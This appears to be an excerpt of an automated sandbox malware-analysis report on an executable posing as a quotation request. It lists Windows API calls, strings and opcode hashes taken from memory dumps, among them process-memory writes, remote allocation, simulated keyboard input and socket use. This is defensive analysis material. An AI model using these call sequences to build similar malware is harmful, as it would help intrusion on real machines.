                                                                                                                    • Instruction Fuzzy Hash: 72F05E708011A99B9A52AF6ABC8180D3F79F718770784052BF810DA2B1CB761962FFE4
                                                                                                                    APIs
                                                                                                                    • EndPath.GDI32(?), ref: 00F295D4
                                                                                                                    • StrokeAndFillPath.GDI32(?,?,00F671F7,00000000,?,?,?), ref: 00F295F0
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00F29603
                                                                                                                    • DeleteObject.GDI32 ref: 00F29616
                                                                                                                    • StrokePath.GDI32(?), ref: 00F29631
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2625713937-0
                                                                                                                    • Opcode ID: 89856cd60a6d6429b4651ce4d008c3cefcbbcb4992c2a3192ebecdd7ab0949dd
                                                                                                                    • Instruction ID: 92ea5225117b8b87342b3b51788b9cdb6800cdc140cebc8c6e589a3258cbcb5a
                                                                                                                    • Opcode Fuzzy Hash: 89856cd60a6d6429b4651ce4d008c3cefcbbcb4992c2a3192ebecdd7ab0949dd
                                                                                                                    • Instruction Fuzzy Hash: 20F0197140A24CEBDB125F66ED587683FA1BB02332F048214F5259A0F2CB748995FF60
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __freea$_free
                                                                                                                    • String ID: a/p$am/pm
                                                                                                                    • API String ID: 3432400110-3206640213
                                                                                                                    • Opcode ID: 448769b0a3d1e037c46d72151f2955b90d552e41c9e76eace3be73363ef2bd81
                                                                                                                    • Instruction ID: 321fb26060d3c1cd9bdd5d2c4d6e8a6de0bc2b22d2d49acfecf4a19528e3fa62
                                                                                                                    • Opcode Fuzzy Hash: 448769b0a3d1e037c46d72151f2955b90d552e41c9e76eace3be73363ef2bd81
                                                                                                                    • Instruction Fuzzy Hash: D1D10132E10206CADB288F68C845BFABFB5FF05720F284119ED11AB650D3759EC0EB91
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F30242: EnterCriticalSection.KERNEL32(00FE070C,00FE1884,?,?,00F2198B,00FE2518,?,?,?,00F112F9,00000000), ref: 00F3024D
                                                                                                                      • Part of subcall function 00F30242: LeaveCriticalSection.KERNEL32(00FE070C,?,00F2198B,00FE2518,?,?,?,00F112F9,00000000), ref: 00F3028A
                                                                                                                      • Part of subcall function 00F19CB3: _wcslen.LIBCMT ref: 00F19CBD
                                                                                                                      • Part of subcall function 00F300A3: __onexit.LIBCMT ref: 00F300A9
                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00F97BFB
                                                                                                                      • Part of subcall function 00F301F8: EnterCriticalSection.KERNEL32(00FE070C,?,?,00F28747,00FE2514), ref: 00F30202
                                                                                                                      • Part of subcall function 00F301F8: LeaveCriticalSection.KERNEL32(00FE070C,?,00F28747,00FE2514), ref: 00F30235
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                                    • String ID: 5$G$Variable must be of type 'Object'.
                                                                                                                    • API String ID: 535116098-3733170431
                                                                                                                    • Opcode ID: 459c0396b387ac6bdf19dd423fc9e8e91bc2503279e05571becf267174afaabe
                                                                                                                    • Instruction ID: a5b1406ab118fa26158eac45566c1a89195efbbdd6c4b6a2b634f68e1f3d0859
                                                                                                                    • Opcode Fuzzy Hash: 459c0396b387ac6bdf19dd423fc9e8e91bc2503279e05571becf267174afaabe
                                                                                                                    • Instruction Fuzzy Hash: 03919A70A14309EFEF04EF54D891DADB7B1BF49310F14805AF806AB292DB71AE81EB51
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F7B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F721D0,?,?,00000034,00000800,?,00000034), ref: 00F7B42D
                                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F72760
                                                                                                                      • Part of subcall function 00F7B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F721FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00F7B3F8
                                                                                                                      • Part of subcall function 00F7B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00F7B355
                                                                                                                      • Part of subcall function 00F7B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F72194,00000034,?,?,00001004,00000000,00000000), ref: 00F7B365
                                                                                                                      • Part of subcall function 00F7B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F72194,00000034,?,?,00001004,00000000,00000000), ref: 00F7B37B
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F727CD
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F7281A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe,00000104), ref: 00F41769
                                                                                                                    • _free.LIBCMT ref: 00F41834
                                                                                                                    • _free.LIBCMT ref: 00F4183E
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                    • String ID: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..exe
                                                                                                                    • API String ID: 2506810119-2911666617
                                                                                                                    APIs
                                                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F7C306
                                                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00F7C34C
                                                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00FE1990,01235688), ref: 00F7C395
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Delete$InfoItem
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 135850232-4108050209
                                                                                                                    APIs
                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00FACC08,00000000,?,?,?,?), ref: 00FA44AA
                                                                                                                    • GetWindowLongW.USER32 ref: 00FA44C7
                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FA44D7
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Long
                                                                                                                    • String ID: SysTreeView32
                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F9335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00F93077,?,?), ref: 00F93378
                                                                                                                    • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F9307A
                                                                                                                    • _wcslen.LIBCMT ref: 00F9309B
                                                                                                                    • htons.WSOCK32(00000000,?,?,00000000), ref: 00F93106
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                    • String ID: 255.255.255.255
                                                                                                                    • API String ID: 946324512-2422070025
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00FA3F40
                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00FA3F54
                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00FA3F78
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window
                                                                                                                    • String ID: SysMonthCal32
                                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00FA4705
                                                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00FA4713
                                                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FA471A
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                                                    • String ID: msctls_updown32
                                                                                                                    • API String ID: 4014797782-2298589950
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen
                                                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                    • API String ID: 176396367-2734436370
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00FA3840
                                                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00FA3850
                                                                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00FA3876
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                                    • String ID: Listbox
                                                                                                                    • API String ID: 3315199576-2633736733
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00F84A08
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F84A5C
• SetErrorMode.KERNEL32(00000000,?,?,00FACC08), ref: 00F84AD0
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: %lu
• API String ID: 2507767853-685833217
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00FA424F
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00FA4264
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00FA4271
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
APIs
  • Part of subcall function 00F16B57: _wcslen.LIBCMT ref: 00F16B6A
  • Part of subcall function 00F72DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00F72DC5
  • Part of subcall function 00F72DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F72DD6
  • Part of subcall function 00F72DA7: GetCurrentThreadId.KERNEL32 ref: 00F72DDD
  • Part of subcall function 00F72DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00F72DE4
• GetFocus.USER32 ref: 00F72F78
  • Part of subcall function 00F72DEE: GetParent.USER32(00000000), ref: 00F72DF9
• GetClassNameW.USER32(?,?,00000100), ref: 00F72FC3
• EnumChildWindows.USER32(?,00F7303B), ref: 00F72FEB
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
• String ID: %s%d
• API String ID: 1272988791-1110647743
APIs
• GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00FA58C1
• SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00FA58EE
• DrawMenuBar.USER32(?), ref: 00FA58FD
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Menu$InfoItem$Draw
• String ID: 0
• API String ID: 3227129158-4108050209
APIs
• GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00F6D3BF
• FreeLibrary.KERNEL32 ref: 00F6D3E5
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: GetSystemWow64DirectoryW$X64
• API String ID: 3013587201-2590602151
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
APIs
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Variant$ClearInitInitializeUninitialize
• String ID:
• API String ID: 1998397398-0
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00FAFC08,?), ref: 00F705F0
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00FAFC08,?), ref: 00F70608
• CLSIDFromProgID.OLE32(?,?,00000000,00FACC40,000000FF,?,00000000,00000800,00000000,?,00FAFC08,?), ref: 00F7062D
• _memcmp.LIBVCRUNTIME ref: 00F7064E
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID:
• API String ID: 314563124-0
APIs
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
• GetWindowRect.USER32(0123EA18,?), ref: 00FA62E2
• ScreenToClient.USER32(?,?), ref: 00FA6315
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00FA6382
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00F91AFD
• WSAGetLastError.WSOCK32 ref: 00F91B0B
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00F91B8A
• WSAGetLastError.WSOCK32 ref: 00F91B94
Similarity
• API ID: ErrorLast$socket
• String ID:
• API String ID: 1881357543-0
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F85783
• GetLastError.KERNEL32(?,00000000), ref: 00F857A9
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F857CE
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F857FA
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00F36D71,00000000,00000000,00F382D9,?,00F382D9,?,00000001,00F36D71,8BE85006,00000001,00F382D9,00F382D9), ref: 00F4D910
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F4D999
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00F4D9AB
• __freea.LIBCMT ref: 00F4D9B4
  • Part of subcall function 00F43820: RtlAllocateHeap.NTDLL(00000000,?,00FE1444,?,00F2FDF5,?,?,00F1A976,00000010,00FE1440,00F113FC,?,00F113C6,?,00F11129), ref: 00F43852
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
• API String ID: 2652629310-0
APIs
• SendMessageW.USER32(?,00001024,00000000,?), ref: 00FA5352
• GetWindowLongW.USER32(?,000000F0), ref: 00FA5375
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FA5382
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00FA53A8
Similarity
• API ID: LongWindow$InvalidateMessageRectSend
• String ID:
• API String ID: 3340791633-0
                                                                                                                    APIs
                                                                                                                    • GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 00F7ABF1
                                                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00F7AC0D
                                                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00F7AC74
                                                                                                                    • SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 00F7ACC6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 432972143-0
                                                                                                                    • Opcode ID: 36395ffc4e9a3f2fc72dceef0b048b8e1110543bb94e898b95dac989e2499511
                                                                                                                    • Instruction ID: 10346a1dbd912118b0f3bfd98b75045b9a29531852c3790458175cf1b0f85a14
                                                                                                                    • Opcode Fuzzy Hash: 36395ffc4e9a3f2fc72dceef0b048b8e1110543bb94e898b95dac989e2499511
                                                                                                                    • Instruction Fuzzy Hash: 9B31F670E046187FEF26CB658C05BFE7AA5ABC9320F05D21BE489921D1C375C985A793
                                                                                                                    APIs
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 00FA769A
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00FA7710
                                                                                                                    • PtInRect.USER32(?,?,00FA8B89), ref: 00FA7720
                                                                                                                    • MessageBeep.USER32(00000000), ref: 00FA778C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1352109105-0
                                                                                                                    • Opcode ID: fd087d08f412436d9e7ed27e006324afccdd230bf336ae3e2919b501f431f2bb
                                                                                                                    • Instruction ID: 9a6d9514c7e2cac856ac328c15b0f5e08bbfbd6efc641747d53820d6135094e7
                                                                                                                    • Opcode Fuzzy Hash: fd087d08f412436d9e7ed27e006324afccdd230bf336ae3e2919b501f431f2bb
                                                                                                                    • Instruction Fuzzy Hash: F5419CB4A09358DFDB01EF59CC94EA9BBF4BB4A310F1940A9E4149B261C730A941EB90
APIs
• GetForegroundWindow.USER32 ref: 00FA16EB
  • Part of subcall function 00F73A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F73A57
  • Part of subcall function 00F73A3D: GetCurrentThreadId.KERNEL32 ref: 00F73A5E
  • Part of subcall function 00F73A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F725B3), ref: 00F73A65
• GetCaretPos.USER32(?), ref: 00FA16FF
• ClientToScreen.USER32(00000000,?), ref: 00FA174C
• GetForegroundWindow.USER32 ref: 00FA1752
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
• Opcode ID: bf7781c6fdd6a958485c30b1010759a6fbcd2202ee2d6a65294288e417d39ee8
• Instruction ID: 66444bf3494643a99b92aa962146c2fefb0c655e35bcef93fd8aa528103b35cd
• Opcode Fuzzy Hash: bf7781c6fdd6a958485c30b1010759a6fbcd2202ee2d6a65294288e417d39ee8
